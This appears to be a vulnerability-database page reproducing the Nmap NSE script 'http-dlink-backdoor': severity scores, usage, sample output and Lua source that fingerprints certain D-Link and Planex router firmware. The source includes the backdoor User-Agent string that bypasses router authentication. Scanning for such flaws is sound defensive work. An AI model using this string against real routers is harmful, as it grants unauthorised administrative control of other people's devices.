http-dlink-backdoor NSE Script

2013-10-17 23:41:12
Patrik Karlsson <[email protected]>
nmap.org

CVSS3: 9.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.973 High, percentile 99.8%

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a "secret" value. Sending that User-Agent bypasses authentication and grants administrative access to the router's web interface. The script first fingerprints the Alpha Networks web server (a 401 from thttpd-alphanetworks or a 302 from Alpha_webserv in reply to an unauthenticated request for "/") and only then repeats the request with the backdoor User-Agent; a 200 reply confirms the bypass. Other web servers are not probed and produce no output.

The following router models are likely to be vulnerable: DIR-100, DIR-120, DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240

In addition, several Planex routers also appear to use the same firmware: BRL-04UR, BRL-04CW

Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

Script Arguments

slaxml.debug

See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -sV --script http-dlink-backdoor <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-dlink-backdoor:
|   VULNERABLE:
|   Firmware backdoor in some models of D-Link routers allow for admin password bypass
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
|
|     References:
|_      http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

Requires

http, shortport, string, vulns

description = [[
Detects a firmware backdoor on some D-Link routers by changing the User-Agent
to a "secret" value. Using the "secret" User-Agent bypasses authentication
and allows admin access to the router.

The following router models are likely to be vulnerable: DIR-100, DIR-120,
DI-624S, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240

In addition, several Planex routers also appear to use the same firmware:
BRL-04UR, BRL-04CW

Reference: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
]]

---
-- @usage
-- nmap -sV --script http-dlink-backdoor <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-dlink-backdoor:
-- |   VULNERABLE:
-- |   Firmware backdoor in some models of D-Link routers allow for admin password bypass
-- |     State: VULNERABLE
-- |     Risk factor: High
-- |     Description:
-- |       D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
-- |
-- |     References:
-- |_      http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/
---

author = "Patrik Karlsson <[email protected]>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln"}

local http = require "http"
local shortport = require "shortport"
local string = require "string"
local vulns = require "vulns"

portrule = shortport.http

action = function(host, port)
  -- Step 1: fetch "/" with the default User-Agent, without following
  -- redirects, and read the Server header to fingerprint the Alpha Networks
  -- firmware that carries the backdoor.
  local response = http.get(host, port, "/", { redirect_ok = false, no_cache = true })
  local server = response.header and response.header['server'] or ""
  local vuln_table = {
    title = "Firmware backdoor in some models of D-Link routers allow for admin password bypass",
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
D-Link routers have been found with a firmware backdoor allowing for admin password bypass using a "secret" User-Agent string.
]],
    references = {
      'http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/',
    }
  }
  -- thttpd-alphanetworks answers an unauthenticated "/" with 401;
  -- Alpha_webserv redirects (302) to its login page. Any other server is
  -- left alone, so the probe below is only ever sent to these two.
  if ( response.status == 401 and server:match("^thttpd%-alphanetworks") ) or
    ( response.status == 302 and server:match("^Alpha_webserv") ) then
    -- Step 2: repeat the same request with the backdoor User-Agent
    -- (read backwards the string is "editby04882joelbackdoor_teslmx").
    response = http.get(host, port, "/", { header = { ["User-Agent"] = "xmlset_roodkcableoj28840ybtide" } })

    -- A 200 for the page that was refused or redirected a moment earlier
    -- means the User-Agent alone bypassed authentication.
    if ( response.status == 200 ) then
      vuln_table.state = vulns.STATE.VULN
      local report = vulns.Report:new(SCRIPT_NAME, host, port)
      return report:make_output(vuln_table)
    end
  end
  -- Not vulnerable or unrecognised server: no Report object is created, so
  -- nothing is printed even with vulns.showall.
  return
end
